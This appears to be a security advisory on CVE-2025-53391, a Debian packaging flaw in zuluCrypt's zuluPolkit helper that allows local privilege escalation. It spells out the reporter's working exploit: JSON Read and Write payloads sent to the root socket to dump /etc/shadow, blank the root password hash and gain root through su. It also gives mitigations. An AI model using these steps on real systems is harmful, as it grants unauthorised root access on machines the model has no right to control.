A severe vulnerability (CVE-2025-53391) was discovered in Debian’s packaging of the disk encryption tool zuluCrypt enables local attackers to gain full root privileges. The flaw stems from a Debian-specific patch that relaxed security restrictions for zuluPolkit, a helper tool.
In 2019, a Debian patch modified zuluPolkit’s polkit policy to allow non-admin users to run it. Originally, only users with auth_admin privileges (typically admins) could use the tool. The patch changed this to auth_self, meaning any authenticated user could trigger it.
This change created a privilege escalation path. zuluPolkit executes high-risk operations as root, including reading/writing arbitrary files and running commands. By design, it deletes any specified file and replaces it with a UNIX socket. Attackers exploit this to overwrite system files like /etc/shadow.
Technical Breakdown: zuluPolkit
zuluPolkit is a background service for zuluCrypt (a GUI disk encryption tool). It handles privileged tasks like decrypting storage devices. It runs as root after user authentication via polkit.
How it works:
A user runs: pkexec /usr/bin/zuluPolkit /path/to/socket
zuluPolkit prompts for a “token” (an authentication cookie).
It deletes the specified file, creates a UNIX socket, and listens for JSON commands.
Commands include:
Read: Outputs any file’s content.
Write: Overwrites any file.
exit or whitelisted shell commands.
Is it installed by default?
No. It’s installed only if users explicitly add zulucrypt or zulucrypt-gui. Default Debian setups aren’t affected unless these packages are added.
The Exploit:
Aaron Rainbolt (reporter) demonstrated the attack on Debian 12:
1- As a non-admin user, run pkexec zuluPolkit /zulu-polkit (entering the user’s password).
2- Send a JSON payload via the UNIX socket to Read /etc/shadow:
{
"cookie": "attacker_token",
"path": "/etc/shadow",
"command": "Read"
}3- Modify the dumped /etc/shadow to remove root’s password hash.
4- Write the modified version back:
{
"cookie": "attacker_token",
"path": "/etc/shadow",
"data": "root::[...]",
"command": "Write"
}5- Run su to get a root shell instantly.
Affected Versions:
Debian 11 (Bullseye) and later, including 12 (Bookworm) and unstable (Sid).
Versions before Debian 10 (Buster) are unaffected.
Mitigation:
Debian has assigned CVE-2025-53391. Until a fix is released:
1- Uninstall zulucrypt and zulucrypt-gui if unused:
sudo apt remove zulucrypt*If required, restrict polkit to admin-only: Revert the patch by changing auth_self back to auth_admin in /usr/share/polkit-1/actions/org.zulucrypt.policy.
Final Advice
Monitor for Debian security updates. Avoid unnecessary privileged tools on multiuser systems. Systems without zulucrypt are safe.
